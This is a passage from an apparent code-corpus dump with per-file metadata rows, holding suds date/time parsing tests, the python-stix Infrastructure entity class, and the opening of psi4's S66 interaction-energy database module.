("0:0:0.9999990", 0, 0, 0, 999999),
("0:0:0.9999991", 0, 0, 0, 999999),
("0:0:0.9999994", 0, 0, 0, 999999),
("0:0:0.99999949", 0, 0, 0, 999999),
("0:0:0.9999995", 0, 0, 1, 0),
("0:0:0.9999996", 0, 0, 1, 0),
("0:0:0.9999999", 0, 0, 1, 0)))
def testConstructFromString_subsecondRounding(self, string, h, m, s,
micros):
assert Time(string).value == datetime.time(h, m, s, micros)
@pytest.mark.parametrize(
("string", "h", "m", "s", "micros", "tz_h", "tz_m"), (
("18:0:09.2139z", 18, 0, 9, 213900, 0, 0),
("18:0:09.2139Z", 18, 0, 9, 213900, 0, 0),
("18:0:09.2139+3", 18, 0, 9, 213900, 3, 0),
("18:0:09.2139-3", 18, 0, 9, 213900, -3, 0),
("18:0:09.2139-03", 18, 0, 9, 213900, -3, 0),
("18:0:09.2139+9:3", 18, 0, 9, 213900, 9, 3),
("18:0:09.2139+10:31", 18, 0, 9, 213900, 10, 31),
("18:0:09.2139-10:31", 18, 0, 9, 213900, -10, -31)))
def testConstructFromString_timezone(self, string, h, m, s, micros, tz_h,
tz_m):
tzdelta = datetime.timedelta(hours=tz_h, minutes=tz_m)
tzinfo = FixedOffsetTimezone(tzdelta)
ref = datetime.time(h, m, s, micros, tzinfo=tzinfo)
assert Time(string).value == ref
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.date(2010, 10, 27),
datetime.datetime(2010, 10, 27, 10, 10)))
def testConstructFromUnknown(self, source):
pytest.raises(ValueError, Time, source)
@pytest.mark.parametrize(("input", "output"), (
("14:05:23.428068", "14:05:23.428068"),
("14:05:23.4280", "14:05:23.428000"),
("23:59:59.9999995", "00:00:00"),
("14:05:23.428068-3", "14:05:23.428068-03:00"),
("14:05:23.068+03", "14:05:23.068000+03:00"),
("14:05:23.4-02:00", "14:05:23.400000-02:00"),
("14:05:23.410+02:00", "14:05:23.410000+02:00"),
("14:05:23.428-23:59", "14:05:23.428000-23:59")))
def testConvertToString(self, input, output):
assert str(Time(input)) == output
class TestXDate:
"""
Tests for the suds.xsd.sxbuiltin.XDate class.
Python object <--> string conversion details already tested in TestDate.
"""
def testTranslateEmptyStringToPythonObject(self):
assert XDate.translate("") == None
def testTranslateStringToPythonObject(self):
assert XDate.translate("1941-12-7") == datetime.date(1941, 12, 7)
def testTranslatePythonObjectToString(self):
date = datetime.date(2013, 7, 24)
translated = XDate.translate(date, topython=False)
assert isinstance(translated, str)
assert translated == "2013-07-24"
def testTranslatePythonObjectToString_datetime(self):
dt = datetime.datetime(2013, 7, 24, 11, 59, 4)
translated = XDate.translate(dt, topython=False)
assert isinstance(translated, str)
assert translated == "2013-07-24"
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.time()))
def testTranslatePythonObjectToString_failed(self, source):
assert XDate.translate(source, topython=False) is source
class TestXDateTime:
"""
Tests for the suds.xsd.sxbuiltin.XDateTime class.
Python object <--> string conversion details already tested in
TestDateTime.
"""
def testTranslateEmptyStringToPythonObject(self):
assert XDateTime.translate("") == None
def testTranslateStringToPythonObject(self):
dt = datetime.datetime(1941, 12, 7, 10, 30, 22, 454000)
assert XDateTime.translate("1941-12-7T10:30:22.454") == dt
def testTranslatePythonObjectToString(self):
dt = datetime.datetime(2021, 12, 31, 11, 25, tzinfo=UtcTimezone())
translated = XDateTime.translate(dt, topython=False)
assert isinstance(translated, str)
assert translated == "2021-12-31T11:25:00+00:00"
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.time(22, 47, 9, 981),
datetime.date(2101, 1, 1)))
def testTranslatePythonObjectToString_failed(self, source):
assert XDateTime.translate(source, topython=False) is source
class TestXTime:
"""
Tests for the suds.xsd.sxbuiltin.XTime class.
Python object <--> string conversion details already tested in
TestDateTime.
"""
def testTranslateEmptyStringToPythonObject(self):
assert XTime.translate("") == None
def testTranslateStringToPythonObject(self):
assert XTime.translate("10:30:22") == datetime.time(10, 30, 22)
def testTranslatePythonObjectToString(self):
time = datetime.time(16, 53, 12, tzinfo=FixedOffsetTimezone(4))
translated = XTime.translate(time, topython=False)
assert isinstance(translated, str)
assert translated == "16:53:12+04:00"
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.date(2101, 1, 1),
datetime.datetime(2101, 1, 1, 22, 47, 9, 981)))
def testTranslatePythonObjectToString_failed(self, source):
assert XTime.translate(source, topython=False) is source
|
lgpl-3.0
| 1,870,702,405,981,344,800
| 34.622881
| 79
| 0.555073
| false
| 2.976456
| true
| false
| false
|
STIXProject/python-stix
|
stix/ttp/infrastructure.py
|
1
|
3544
|
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
# mixbox
from mixbox import fields
# cybox
from cybox.core import Observables
# internal
import stix
from stix.common import StructuredTextList, VocabString
from stix.common.vocabs import AttackerInfrastructureType
import stix.bindings.ttp as ttp_binding
class Infrastructure(stix.Entity):
_binding = ttp_binding
_binding_class = _binding.InfrastructureType
_namespace = "http://stix.mitre.org/TTP-1"
id_ = fields.IdField("id")
idref = fields.IdrefField("idref")
title = fields.TypedField("Title")
descriptions = fields.TypedField("Description", StructuredTextList)
short_descriptions = fields.TypedField("Short_Description", StructuredTextList)
types = fields.TypedField("Type", VocabString, multiple=True, key_name="types")
observable_characterization = fields.TypedField("Observable_Characterization", Observables)
def __init__(self, id_=None, idref=None, title=None, description=None, short_description=None):
super(Infrastructure, self).__init__()
self.id_ = id_
self.idref = idref
self.title = title
self.description = StructuredTextList(description)
self.short_description = StructuredTextList(short_description)
@property
def description(self):
"""A single description about the contents or purpose of this object.
Default Value: ``None``
Note:
If this object has more than one description set, this will return
the description with the lowest ordinality value.
Returns:
An instance of :class:`.StructuredText`
"""
if self.descriptions is None:
self.descriptions = StructuredTextList()
return next(iter(self.descriptions), None)
@description.setter
def description(self, value):
self.descriptions = StructuredTextList(value)
def add_description(self, description):
"""Adds a description to the ``descriptions`` collection.
This is the same as calling "foo.descriptions.add(bar)".
"""
self.descriptions.add(description)
@property
def short_description(self):
"""A single short description about the contents or purpose of this
object.
Default Value: ``None``
Note:
If this object has more than one short description set, this will
return the description with the lowest ordinality value.
Returns:
An instance of :class:`.StructuredText`
"""
if self.short_descriptions is None:
self.short_descriptions = StructuredTextList()
return next(iter(self.short_descriptions), None)
@short_description.setter
def short_description(self, value):
        self.short_descriptions = StructuredTextList(value)
def add_short_description(self, description):
"""Adds a description to the ``short_descriptions`` collection.
This is the same as calling "foo.short_descriptions.add(bar)".
"""
self.short_descriptions.add(description)
def add_type(self, type_):
self.types.append(type_)
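# A minimal usage sketch (hypothetical values) for the fields above:
#
#     infra = Infrastructure(title="Attacker hosting",
#                            description="Leased VPS nodes used for staging")
#     infra.add_type(VocabString("Hosting"))  # appends to the 'types' collection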
class InfraStructureTypes(stix.EntityList):
_namespace = "http://stix.mitre.org/TTP-1"
_contained_type = VocabString
@classmethod
def _dict_as_list(cls):
return True
def _fix_value(self, value):
return AttackerInfrastructureType(value)
|
bsd-3-clause
| -5,174,635,102,382,686,000
| 30.927928
| 99
| 0.670429
| false
| 4.189125
| false
| false
| false
|
amjames/psi4
|
psi4/share/psi4/databases/S66.py
|
1
|
148397
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2018 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
| Database (Hobza) of interaction energies for bimolecular complexes.
| Geometries and reference energies from Rezac et al. JCTC 7 2427 (2011).
- **cp** ``'off'`` || ``'on'``
- **rlxd** ``'off'``
- **subset**
- ``'small'``
- ``'large'``
- ``'HB'`` hydrogen-bonded systems
- ``'MX'`` mixed-influence systems
- ``'DD'`` dispersion-dominated systems
"""
import re
import qcdb
# <<< S66 Database Module >>>
dbse = 'S66'
# <<< Database Members >>>
HRXN = range(1, 67)
HRXN_SM = [1, 12, 59]
HRXN_LG = [26, 34]
HB = range(1, 24)
MX = range(47, 67)
DD = range(24, 47)
# <<< Chemical Systems Involved >>>
RXNM = {} # reaction matrix of reagent contributions per reaction
ACTV = {} # order of active reagents per reaction
ACTV_CP = {} # order of active reagents per counterpoise-corrected reaction
ACTV_SA = {} # order of active reagents for non-supermolecular calculations
for rxn in HRXN:
RXNM[ '%s-%s' % (dbse, rxn)] = {'%s-%s-dimer' % (dbse, rxn) : +1,
'%s-%s-monoA-CP' % (dbse, rxn) : -1,
'%s-%s-monoB-CP' % (dbse, rxn) : -1,
'%s-%s-monoA-unCP' % (dbse, rxn) : -1,
'%s-%s-monoB-unCP' % (dbse, rxn) : -1 }
ACTV_SA['%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn) ]
ACTV_CP['%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn),
'%s-%s-monoA-CP' % (dbse, rxn),
'%s-%s-monoB-CP' % (dbse, rxn) ]
ACTV[ '%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn),
'%s-%s-monoA-unCP' % (dbse, rxn),
'%s-%s-monoB-unCP' % (dbse, rxn) ]
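# Each counterpoise-corrected interaction energy is thus assembled as
# IE = E(dimer) - E(monoA) - E(monoB), with the "-CP" monomers evaluated in
# the full dimer basis and the "-unCP" monomers in their own monomer bases.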
# <<< Reference Values [kcal/mol] >>>
BIND = {}
BIND['%s-%s' % (dbse, '1' )] = -4.918
BIND['%s-%s' % (dbse, '2' )] = -5.592
BIND['%s-%s' % (dbse, '3' )] = -6.908
BIND['%s-%s' % (dbse, '4' )] = -8.103
BIND['%s-%s' % (dbse, '5' )] = -5.757
BIND['%s-%s' % (dbse, '6' )] = -7.554
BIND['%s-%s' % (dbse, '7' )] = -8.230
BIND['%s-%s' % (dbse, '8' )] = -5.009
BIND['%s-%s' % (dbse, '9' )] = -3.059
BIND['%s-%s' % (dbse, '10' )] = -4.160
BIND['%s-%s' % (dbse, '11' )] = -5.419
BIND['%s-%s' % (dbse, '12' )] = -7.266
BIND['%s-%s' % (dbse, '13' )] = -6.187
BIND['%s-%s' % (dbse, '14' )] = -7.454
BIND['%s-%s' % (dbse, '15' )] = -8.630
BIND['%s-%s' % (dbse, '16' )] = -5.124
BIND['%s-%s' % (dbse, '17' )] = -17.182
BIND['%s-%s' % (dbse, '18' )] = -6.857
BIND['%s-%s' % (dbse, '19' )] = -7.410
BIND['%s-%s' % (dbse, '20' )] = -19.093
BIND['%s-%s' % (dbse, '21' )] = -16.265
BIND['%s-%s' % (dbse, '22' )] = -19.491
BIND['%s-%s' % (dbse, '23' )] = -19.189
BIND['%s-%s' % (dbse, '24' )] = -2.822
BIND['%s-%s' % (dbse, '25' )] = -3.895
BIND['%s-%s' % (dbse, '26' )] = -9.829
BIND['%s-%s' % (dbse, '27' )] = -3.439
BIND['%s-%s' % (dbse, '28' )] = -5.713
BIND['%s-%s' % (dbse, '29' )] = -6.819
BIND['%s-%s' % (dbse, '30' )] = -1.432
BIND['%s-%s' % (dbse, '31' )] = -3.380
BIND['%s-%s' % (dbse, '32' )] = -3.738
BIND['%s-%s' % (dbse, '33' )] = -1.872
BIND['%s-%s' % (dbse, '34' )] = -3.776
BIND['%s-%s' % (dbse, '35' )] = -2.613
BIND['%s-%s' % (dbse, '36' )] = -1.777
BIND['%s-%s' % (dbse, '37' )] = -2.404
BIND['%s-%s' % (dbse, '38' )] = -2.997
BIND['%s-%s' % (dbse, '39' )] = -3.575
BIND['%s-%s' % (dbse, '40' )] = -2.895
BIND['%s-%s' % (dbse, '41' )] = -4.848
BIND['%s-%s' % (dbse, '42' )] = -4.138
BIND['%s-%s' % (dbse, '43' )] = -3.712
BIND['%s-%s' % (dbse, '44' )] = -2.005
BIND['%s-%s' % (dbse, '45' )] = -1.748
BIND['%s-%s' % (dbse, '46' )] = -4.264
BIND['%s-%s' % (dbse, '47' )] = -2.876
BIND['%s-%s' % (dbse, '48' )] = -3.535
BIND['%s-%s' % (dbse, '49' )] = -3.331
BIND['%s-%s' % (dbse, '50' )] = -2.867
BIND['%s-%s' % (dbse, '51' )] = -1.524
BIND['%s-%s' % (dbse, '52' )] = -4.707
BIND['%s-%s' % (dbse, '53' )] = -4.361
BIND['%s-%s' % (dbse, '54' )] = -3.277
BIND['%s-%s' % (dbse, '55' )] = -4.188
BIND['%s-%s' % (dbse, '56' )] = -3.231
BIND['%s-%s' % (dbse, '57' )] = -5.282
BIND['%s-%s' % (dbse, '58' )] = -4.146
BIND['%s-%s' % (dbse, '59' )] = -2.850
BIND['%s-%s' % (dbse, '60' )] = -4.868
BIND['%s-%s' % (dbse, '61' )] = -2.912
BIND['%s-%s' % (dbse, '62' )] = -3.534
BIND['%s-%s' % (dbse, '63' )] = -3.801
BIND['%s-%s' % (dbse, '64' )] = -2.999
BIND['%s-%s' % (dbse, '65' )] = -3.991
BIND['%s-%s' % (dbse, '66' )] = -3.968
# <<< Comment Lines >>>
TAGL = {}
TAGL['%s-%s' % (dbse, '1' )] = """Water Dimer """
TAGL['%s-%s-dimer' % (dbse, '1' )] = """Dimer from Water Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '1' )] = """Monomer A from Water Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '1' )] = """Monomer B from Water Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '1' )] = """Monomer A from Water Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '1' )] = """Monomer B from Water Dimer """
TAGL['%s-%s' % (dbse, '2' )] = """Water-Methanol """
TAGL['%s-%s-dimer' % (dbse, '2' )] = """Dimer from Water-Methanol """
TAGL['%s-%s-monoA-CP' % (dbse, '2' )] = """Monomer A from Water-Methanol """
TAGL['%s-%s-monoB-CP' % (dbse, '2' )] = """Monomer B from Water-Methanol """
TAGL['%s-%s-monoA-unCP' % (dbse, '2' )] = """Monomer A from Water-Methanol """
TAGL['%s-%s-monoB-unCP' % (dbse, '2' )] = """Monomer B from Water-Methanol """
TAGL['%s-%s' % (dbse, '3' )] = """Water-Methylamine """
TAGL['%s-%s-dimer' % (dbse, '3' )] = """Dimer from Water-Methylamine """
TAGL['%s-%s-monoA-CP' % (dbse, '3' )] = """Monomer A from Water-Methylamine """
TAGL['%s-%s-monoB-CP' % (dbse, '3' )] = """Monomer B from Water-Methylamine """
TAGL['%s-%s-monoA-unCP' % (dbse, '3' )] = """Monomer A from Water-Methylamine """
TAGL['%s-%s-monoB-unCP' % (dbse, '3' )] = """Monomer B from Water-Methylamine """
TAGL['%s-%s' % (dbse, '4' )] = """Water-N-methylacetamide """
TAGL['%s-%s-dimer' % (dbse, '4' )] = """Dimer from Water-N-methylacetamide """
TAGL['%s-%s-monoA-CP' % (dbse, '4' )] = """Monomer A from Water-N-methylacetamide """
TAGL['%s-%s-monoB-CP' % (dbse, '4' )] = """Monomer B from Water-N-methylacetamide """
TAGL['%s-%s-monoA-unCP' % (dbse, '4' )] = """Monomer A from Water-N-methylacetamide """
TAGL['%s-%s-monoB-unCP' % (dbse, '4' )] = """Monomer B from Water-N-methylacetamide """
TAGL['%s-%s' % (dbse, '5' )] = """Methanol Dimer """
TAGL['%s-%s-dimer' % (dbse, '5' )] = """Dimer from Methanol Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '5' )] = """Monomer A from Methanol Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '5' )] = """Monomer B from Methanol Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '5' )] = """Monomer A from Methanol Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '5' )] = """Monomer B from Methanol Dimer """
TAGL['%s-%s' % (dbse, '6' )] = """Methanol-Methylamine """
TAGL['%s-%s-dimer' % (dbse, '6' )] = """Dimer from Methanol-Methylamine """
TAGL['%s-%s-monoA-CP' % (dbse, '6' )] = """Monomer A from Methanol-Methylamine """
TAGL['%s-%s-monoB-CP' % (dbse, '6' )] = """Monomer B from Methanol-Methylamine """
TAGL['%s-%s-monoA-unCP' % (dbse, '6' )] = """Monomer A from Methanol-Methylamine """
TAGL['%s-%s-monoB-unCP' % (dbse, '6' )] = """Monomer B from Methanol-Methylamine """
TAGL['%s-%s' % (dbse, '7' )] = """Methanol-N-methylacetamide """
TAGL['%s-%s-dimer' % (dbse, '7' )] = """Dimer from Methanol-N-methylacetamide """
TAGL['%s-%s-monoA-CP' % (dbse, '7' )] = """Monomer A from Methanol-N-methylacetamide """
TAGL['%s-%s-monoB-CP' % (dbse, '7' )] = """Monomer B from Methanol-N-methylacetamide """
TAGL['%s-%s-monoA-unCP' % (dbse, '7' )] = """Monomer A from Methanol-N-methylacetamide """
TAGL['%s-%s-monoB-unCP' % (dbse, '7' )] = """Monomer B from Methanol-N-methylacetamide """
TAGL['%s-%s' % (dbse, '8' )] = """Methanol-Water """
TAGL['%s-%s-dimer' % (dbse, '8' )] = """Dimer from Methanol-Water """
TAGL['%s-%s-monoA-CP' % (dbse, '8' )] = """Monomer A from Methanol-Water """
TAGL['%s-%s-monoB-CP' % (dbse, '8' )] = """Monomer B from Methanol-Water """
TAGL['%s-%s-monoA-unCP' % (dbse, '8' )] = """Monomer A from Methanol-Water """
TAGL['%s-%s-monoB-unCP' % (dbse, '8' )] = """Monomer B from Methanol-Water """
TAGL['%s-%s' % (dbse, '9' )] = """Methylamine-Methanol """
TAGL['%s-%s-dimer' % (dbse, '9' )] = """Dimer from Methylamine-Methanol """
TAGL['%s-%s-monoA-CP' % (dbse, '9' )] = """Monomer A from Methylamine-Methanol """
TAGL['%s-%s-monoB-CP' % (dbse, '9' )] = """Monomer B from Methylamine-Methanol """
TAGL['%s-%s-monoA-unCP' % (dbse, '9' )] = """Monomer A from Methylamine-Methanol """
TAGL['%s-%s-monoB-unCP' % (dbse, '9' )] = """Monomer B from Methylamine-Methanol """
TAGL['%s-%s' % (dbse, '10' )] = """Methylamine Dimer """
TAGL['%s-%s-dimer' % (dbse, '10' )] = """Dimer from Methylamine Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '10' )] = """Monomer A from Methylamine Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '10' )] = """Monomer B from Methylamine Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '10' )] = """Monomer A from Methylamine Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '10' )] = """Monomer B from Methylamine Dimer """
TAGL['%s-%s' % (dbse, '11' )] = """Methylamine-N-methylacetamide """
TAGL['%s-%s-dimer' % (dbse, '11' )] = """Dimer from Methylamine-N-methylacetamide """
TAGL['%s-%s-monoA-CP' % (dbse, '11' )] = """Monomer A from Methylamine-N-methylacetamide """
TAGL['%s-%s-monoB-CP' % (dbse, '11' )] = """Monomer B from Methylamine-N-methylacetamide """
TAGL['%s-%s-monoA-unCP' % (dbse, '11' )] = """Monomer A from Methylamine-N-methylacetamide """
TAGL['%s-%s-monoB-unCP' % (dbse, '11' )] = """Monomer B from Methylamine-N-methylacetamide """
TAGL['%s-%s' % (dbse, '12' )] = """Methylamine-Water """
TAGL['%s-%s-dimer' % (dbse, '12' )] = """Dimer from Methylamine-Water """
TAGL['%s-%s-monoA-CP' % (dbse, '12' )] = """Monomer A from Methylamine-Water """
TAGL['%s-%s-monoB-CP' % (dbse, '12' )] = """Monomer B from Methylamine-Water """
TAGL['%s-%s-monoA-unCP' % (dbse, '12' )] = """Monomer A from Methylamine-Water """
TAGL['%s-%s-monoB-unCP' % (dbse, '12' )] = """Monomer B from Methylamine-Water """
TAGL['%s-%s' % (dbse, '13' )] = """N-methylacetamide-Methanol """
TAGL['%s-%s-dimer' % (dbse, '13' )] = """Dimer from N-methylacetamide-Methanol """
TAGL['%s-%s-monoA-CP' % (dbse, '13' )] = """Monomer A from N-methylacetamide-Methanol """
TAGL['%s-%s-monoB-CP' % (dbse, '13' )] = """Monomer B from N-methylacetamide-Methanol """
TAGL['%s-%s-monoA-unCP' % (dbse, '13' )] = """Monomer A from N-methylacetamide-Methanol """
TAGL['%s-%s-monoB-unCP' % (dbse, '13' )] = """Monomer B from N-methylacetamide-Methanol """
TAGL['%s-%s' % (dbse, '14' )] = """N-methylacetamide-Methylamine """
TAGL['%s-%s-dimer' % (dbse, '14' )] = """Dimer from N-methylacetamide-Methylamine """
TAGL['%s-%s-monoA-CP' % (dbse, '14' )] = """Monomer A from N-methylacetamide-Methylamine """
TAGL['%s-%s-monoB-CP' % (dbse, '14' )] = """Monomer B from N-methylacetamide-Methylamine """
TAGL['%s-%s-monoA-unCP' % (dbse, '14' )] = """Monomer A from N-methylacetamide-Methylamine """
TAGL['%s-%s-monoB-unCP' % (dbse, '14' )] = """Monomer B from N-methylacetamide-Methylamine """
TAGL['%s-%s' % (dbse, '15' )] = """N-methylacetamide Dimer """
TAGL['%s-%s-dimer' % (dbse, '15' )] = """Dimer from N-methylacetamide Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '15' )] = """Monomer A from N-methylacetamide Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '15' )] = """Monomer B from N-methylacetamide Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '15' )] = """Monomer A from N-methylacetamide Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '15' )] = """Monomer B from N-methylacetamide Dimer """
TAGL['%s-%s' % (dbse, '16' )] = """N-methylacetamide-Water """
TAGL['%s-%s-dimer' % (dbse, '16' )] = """Dimer from N-methylacetamide-Water """
TAGL['%s-%s-monoA-CP' % (dbse, '16' )] = """Monomer A from N-methylacetamide-Water """
TAGL['%s-%s-monoB-CP' % (dbse, '16' )] = """Monomer B from N-methylacetamide-Water """
TAGL['%s-%s-monoA-unCP' % (dbse, '16' )] = """Monomer A from N-methylacetamide-Water """
TAGL['%s-%s-monoB-unCP' % (dbse, '16' )] = """Monomer B from N-methylacetamide-Water """
TAGL['%s-%s' % (dbse, '17' )] = """Uracil Dimer, HB """
TAGL['%s-%s-dimer' % (dbse, '17' )] = """Dimer from Uracil Dimer, HB """
TAGL['%s-%s-monoA-CP' % (dbse, '17' )] = """Monomer A from Uracil Dimer, HB """
TAGL['%s-%s-monoB-CP' % (dbse, '17' )] = """Monomer B from Uracil Dimer, HB """
TAGL['%s-%s-monoA-unCP' % (dbse, '17' )] = """Monomer A from Uracil Dimer, HB """
TAGL['%s-%s-monoB-unCP' % (dbse, '17' )] = """Monomer B from Uracil Dimer, HB """
TAGL['%s-%s' % (dbse, '18' )] = """Water-Pyridine """
TAGL['%s-%s-dimer' % (dbse, '18' )] = """Dimer from Water-Pyridine """
TAGL['%s-%s-monoA-CP' % (dbse, '18' )] = """Monomer A from Water-Pyridine """
TAGL['%s-%s-monoB-CP' % (dbse, '18' )] = """Monomer B from Water-Pyridine """
TAGL['%s-%s-monoA-unCP' % (dbse, '18' )] = """Monomer A from Water-Pyridine """
TAGL['%s-%s-monoB-unCP' % (dbse, '18' )] = """Monomer B from Water-Pyridine """
TAGL['%s-%s' % (dbse, '19' )] = """Methanol-Pyridine """
TAGL['%s-%s-dimer' % (dbse, '19' )] = """Dimer from Methanol-Pyridine """
TAGL['%s-%s-monoA-CP' % (dbse, '19' )] = """Monomer A from Methanol-Pyridine """
TAGL['%s-%s-monoB-CP' % (dbse, '19' )] = """Monomer B from Methanol-Pyridine """
TAGL['%s-%s-monoA-unCP' % (dbse, '19' )] = """Monomer A from Methanol-Pyridine """
TAGL['%s-%s-monoB-unCP' % (dbse, '19' )] = """Monomer B from Methanol-Pyridine """
TAGL['%s-%s' % (dbse, '20' )] = """Acetic Acid Dimer """
TAGL['%s-%s-dimer' % (dbse, '20' )] = """Dimer from Acetic Acid Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '20' )] = """Monomer A from Acetic Acid Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '20' )] = """Monomer B from Acetic Acid Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '20' )] = """Monomer A from Acetic Acid Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '20' )] = """Monomer B from Acetic Acid Dimer """
TAGL['%s-%s' % (dbse, '21' )] = """Acetamide Dimer """
TAGL['%s-%s-dimer' % (dbse, '21' )] = """Dimer from Acetamide Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '21' )] = """Monomer A from Acetamide Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '21' )] = """Monomer B from Acetamide Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '21' )] = """Monomer A from Acetamide Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '21' )] = """Monomer B from Acetamide Dimer """
TAGL['%s-%s' % (dbse, '22' )] = """Acetic Acid-Uracil """
TAGL['%s-%s-dimer' % (dbse, '22' )] = """Dimer from Acetic Acid-Uracil """
TAGL['%s-%s-monoA-CP' % (dbse, '22' )] = """Monomer A from Acetic Acid-Uracil """
TAGL['%s-%s-monoB-CP' % (dbse, '22' )] = """Monomer B from Acetic Acid-Uracil """
TAGL['%s-%s-monoA-unCP' % (dbse, '22' )] = """Monomer A from Acetic Acid-Uracil """
TAGL['%s-%s-monoB-unCP' % (dbse, '22' )] = """Monomer B from Acetic Acid-Uracil """
TAGL['%s-%s' % (dbse, '23' )] = """Acetamide-Uracil """
TAGL['%s-%s-dimer' % (dbse, '23' )] = """Dimer from Acetamide-Uracil """
TAGL['%s-%s-monoA-CP' % (dbse, '23' )] = """Monomer A from Acetamide-Uracil """
TAGL['%s-%s-monoB-CP' % (dbse, '23' )] = """Monomer B from Acetamide-Uracil """
TAGL['%s-%s-monoA-unCP' % (dbse, '23' )] = """Monomer A from Acetamide-Uracil """
TAGL['%s-%s-monoB-unCP' % (dbse, '23' )] = """Monomer B from Acetamide-Uracil """
TAGL['%s-%s' % (dbse, '24' )] = """Benzene Dimer, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '24' )] = """Dimer from Benzene Dimer, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '24' )] = """Monomer A from Benzene Dimer, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '24' )] = """Monomer B from Benzene Dimer, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '24' )] = """Monomer A from Benzene Dimer, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '24' )] = """Monomer B from Benzene Dimer, pi-pi """
TAGL['%s-%s' % (dbse, '25' )] = """Pyridine Dimer, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '25' )] = """Dimer from Pyridine Dimer, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '25' )] = """Monomer A from Pyridine Dimer, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '25' )] = """Monomer B from Pyridine Dimer, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '25' )] = """Monomer A from Pyridine Dimer, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '25' )] = """Monomer B from Pyridine Dimer, pi-pi """
TAGL['%s-%s' % (dbse, '26' )] = """Uracil Dimer, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '26' )] = """Dimer from Uracil Dimer, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '26' )] = """Monomer A from Uracil Dimer, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '26' )] = """Monomer B from Uracil Dimer, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '26' )] = """Monomer A from Uracil Dimer, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '26' )] = """Monomer B from Uracil Dimer, pi-pi """
TAGL['%s-%s' % (dbse, '27' )] = """Benzene-Pyridine, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '27' )] = """Dimer from Benzene-Pyridine, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '27' )] = """Monomer A from Benzene-Pyridine, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '27' )] = """Monomer B from Benzene-Pyridine, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '27' )] = """Monomer A from Benzene-Pyridine, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '27' )] = """Monomer B from Benzene-Pyridine, pi-pi """
TAGL['%s-%s' % (dbse, '28' )] = """Benzene-Uracil, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '28' )] = """Dimer from Benzene-Uracil, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '28' )] = """Monomer A from Benzene-Uracil, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '28' )] = """Monomer B from Benzene-Uracil, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '28' )] = """Monomer A from Benzene-Uracil, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '28' )] = """Monomer B from Benzene-Uracil, pi-pi """
TAGL['%s-%s' % (dbse, '29' )] = """Pyridine-Uracil, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '29' )] = """Dimer from Pyridine-Uracil, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '29' )] = """Monomer A from Pyridine-Uracil, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '29' )] = """Monomer B from Pyridine-Uracil, pi-pi """
